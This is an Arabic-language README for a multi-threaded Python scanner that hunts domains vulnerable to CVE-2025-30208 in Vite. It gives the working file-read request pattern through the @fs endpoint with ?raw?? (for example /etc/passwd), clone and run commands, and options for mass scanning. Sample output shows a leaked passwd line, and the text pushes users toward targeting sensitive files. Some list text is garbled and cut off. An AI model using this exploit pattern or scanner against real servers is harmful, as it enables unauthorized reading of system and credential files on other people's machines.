
CVE-2025-30208 ViteVulnScanner
يو، هذا سكربت بايثون متعدد الخيوط رهيب من keklick1337 لاصطياد النطاقات المعرضة لـ CVE-2025-30208 في Vite. ببساطة، يتحقق مما إذا كان بإمكانك انتزاع ملفات عشوائية عبر endpoint @fs مع ?raw?? أو ?import&raw?? — فكر في تسريبات /etc/passwd وأشياء خطيرة أخرى. فيه تصفية ذكية للإيجابيات الكاذبة حتى لا تضيع وقتك على هراء، بالإضافة إلى خيارات لتعديل كيفية إخراج النتائج.
<head> و <body> ما لم تكن مشبوهة بشكل شرعي.sourcemappingurl أو export default لتأكيد الشيء الحقيقي.results_good.txt, results_maybe_good.txt, results_bad.txt).-u إذا كنت تحب ذلك.requestsurllib3git clone https://github.com/keklick1337/CVE-2025-30208-ViteVulnScanner.git
cd CVE-2025-30208-ViteVulnScanner
pip install requests urllib3
path_list.txt: المسارات المراد فحصها، سطر واحد لكل مسار (مثال: /etc/passwd).domains.txt: النطاقات المراد ضربها، سطر واحد لكل نطاق (مثال: example.com).شغله هكذا:
python3 CVE-2025-30208.py <domains_file> [options]
<domains_file>: قائمة نطاقاتك (بدون ملف، لا مسح، واضح).-t, --threads: عدد الخيوط التي ستطلقها (الافتراضي: 10).-p, --protocol: فرض http أو https، أو تجاهله لكلاهما.-u, --urls: ألصق URLs الضعيفة في المخرجات.-o, --output: الاسم الأساسي للملفات (الافتراضي: results).-f, --format: txt لملفات مقسمة أو jsonl لملف واحد عملاق (الافتراضي: txt).python3 CVE-2025-30208.py domains.txt
python3 CVE-2025-30208.py domains.txt -t 20 -u -f jsonl
python3 CVE-2025-30208.py domains.txt -t 5 -p https
-f txt)results_good.txt: أشياء مكسورة بالتأكيد (تحتوي على sourcemappingurl أو export default).results_maybe_good.txt: قد تكون ضعيفة، لكن لا دليل قاطع.results_bad.txt: نظيف، لا قلق.-u وسيتم إلحاق URLs مع علامة تبويب (\t).results_good.txt مع -u:example.com https://example.com/@fs/etc/passwd?raw??
-f jsonl)results_good.jsonl, results_maybe_good.jsonl, results_bad.jsonl.domain: ما قمت بفحصه.status: VULNERABLE, MAYBE VULNERABLE, أو BAD.url (إذا -u): أين المكسور.response: ما سعل به الخادم.results_good.jsonl:{"domain": "example.com", "status": "VULNERABLE", "url": "https://example.com/@fs/etc/passwd?raw??", "response": "root:x:0:0:root:/root:/bin/bash"}
/1e4c911a3fd2244596863ddbfa6f3600/7970621079b41658dcd6c205640b3602/fake).<head> و <body>، فهذا رفض — الخادم مجرد متخلف.path_list.txt مع @fs/<path>?raw?? و ?import&raw??.<head> و <body>؟ تخطاه.sourcemappingurl أو export default؟ بوم، GOOD.MAYBE_GOOD.BAD.urllib3.disable_warnings())، لذا لا تشتكي من الشهادات. كن حذرًا بالخارج.path_list.txt لأهدافك — الملفات الحساسة هي الصفقة الحقيقية.اسمع: هذه الأشياء للأغراض التعليمية فقط، يا صديقي. لست مسؤولاً إذا أفسدت شيئًا، أو أمسكت بك، أو أزعجت أحدًا بهذا. استخدمه لتتعلم، لا لتكون وغدًا. كل المخاطر عليك، nahuy — أنا هنا فقط لأنزل الكود.
عندك أفكار؟ وجدت خطأ؟ تواصل معي عبر issues أو pull requests. طرق إضافية لقتل الإيجابيات الكاذبة أو ميزات رائعة؟ دعنا نجعل هذا الوحش أكثر شراسة.